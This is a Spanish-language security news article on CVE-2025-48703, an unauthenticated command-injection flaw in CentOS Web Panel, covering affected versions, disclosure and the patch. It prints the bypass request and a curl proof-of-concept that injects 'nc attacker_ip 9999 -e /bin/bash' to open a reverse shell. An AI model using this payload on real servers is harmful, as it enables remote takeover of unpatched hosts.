Se ha descubierto una vulnerabilidad de seguridad crítica en CentOS Web Panel (CWP) que permite a atacantes remotos no autenticados ejecutar comandos arbitrarios en los servidores afectados.
La falla, identificada como CVE-2025-48703, afecta a uno de los paneles de control de alojamiento web gratuito más utilizados, con más de 200.000 casos identificados en todo el mundo mediante búsquedas de Shodan.
Defectos de omisión de autenticación e inyección de comandos
La vulnerabilidad se debe a una verificación de autenticación inadecuada en el sistema de gestión de archivos de CWP.
El investigador de seguridad Maxime Rinaudo descubrió que la funcionalidad de cambio de permisos de archivos del panel de usuario no valida correctamente las credenciales del usuario.
Cuando los usuarios legítimos modifican los permisos de los archivos a través de la interfaz web, el sistema genera solicitudes HTTP POST a /cwp_30776ec647a8f390/myuser/myuser/index.php?module=filemanager&acc=changePerm.
Sin embargo, los atacantes pueden eludir la autenticación por completo eliminando los identificadores de usuario de la ruta URL.
Una solicitud maliciosa se puede diseñar de forma tan simple como: POST /myuser/index.php?module=filemanager&acc=changePerm sin cookies de autenticación ni tokens de sesión.
El único requisito es conocer un nombre de usuario válido no root creado dentro de la interfaz de administración de CWP. La estructura de solicitud vulnerable utiliza datos de formulario de varias partes que contienen parámetros como nombre de archivo, ruta actual y, lo que es más importante, el parámetro t_total que especifica los permisos de archivo.
Esta omisión de autenticación afecta a las versiones de CWP 0.9.8.1204 y 0.9.8.1188 que se ejecutan en sistemas CentOS 7. El segundo componente de esta cadena de vulnerabilidad implica la inyección de comandos a través del parámetro t_total.
Este parámetro, destinado a establecer modos de permiso de archivos para el comando del sistema chmod, carece de una desinfección de entrada adecuada. Los atacantes pueden inyectar comandos de shell arbitrarios utilizando la sintaxis de sustitución de comandos.
Cuando el servidor procesa cambios de permisos, ejecuta: chmod 644 “/home/myuser/.bashrc” a través del shell del sistema.
Al manipular el parámetro t_total con cargas útiles como $(arbitrary_command) o notación de comillas invertidas, los atacantes logran la ejecución remota de código con los privilegios de la cuenta de usuario objetivo.
La cadena de explotación se puede demostrar usando curl:
curl -kis ‘https://target:2083/username/index.php?module=filemanager&acc=changePerm’ –data ‘fileName=.bashrc¤tPath=/home/username&t_total=nc attacker_ip 9999 -e /bin/bash’.
Esta carga útil establece una conexión de shell inversa, lo que otorga a los atacantes acceso interactivo al sistema comprometido.
Detalles de la vulnerabilidad:
- Productos Afectados: CentOS Web Panel versiones 0.9.8.1204 y 0.9.8.1188 ejecutándose en sistemas CentOS 7.
- Impacto: Ejecución remota de código (RCE).
- Requisitos: Conocimiento de un nombre de usuario no root válido creado en CWP. Acceso de red al servicio CWP (normalmente puerto 2083). Capacidades básicas de cliente HTTP (curl, navegador, etc.).
- Puntuación CVSS 3.1: Probablemente 9.0 o superior.
CentOS Web Panel sirve como una alternativa gratuita a soluciones comerciales como cPanel y Plesk, administrando servicios esenciales, incluidos servidores web Apache/NGINX, bases de datos MySQL/MariaDB, sistemas de correo electrónico y configuraciones DNS.
El impacto de la vulnerabilidad se ve amplificado por la adopción global de CWP en servidores dedicados y entornos de alojamiento VPS.
Los investigadores de seguridad ya han comenzado a desarrollar herramientas de explotación automatizadas. Se envió una solicitud del módulo del marco Metasploit (#20344) al repositorio rapid7/metasploit-framework, lo que indica la gravedad de la vulnerabilidad y su potencial de explotación generalizada.
El código de prueba de concepto demuestra una explotación confiable contra instancias vulnerables accesibles en el puerto 2083.
Los desarrolladores de CWP respondieron rápidamente después de la divulgación responsable el 13 de mayo de 2025. Se asignó CVE-2025-48703 el 23 de mayo y se lanzó un parche de seguridad en la versión 0.9.8.1205 durante junio de 2025.
Las organizaciones que ejecutan CWP deben actualizar inmediatamente a la versión parcheada y auditar sus sistemas para detectar posibles indicadores de compromiso, incluidas conexiones de red inesperadas y modificaciones de archivos no autorizadas.
La simplicidad de la vulnerabilidad y la disponibilidad de exploits funcionales la convierten en una amenaza importante para las instalaciones de CWP sin parches en todo el mundo.
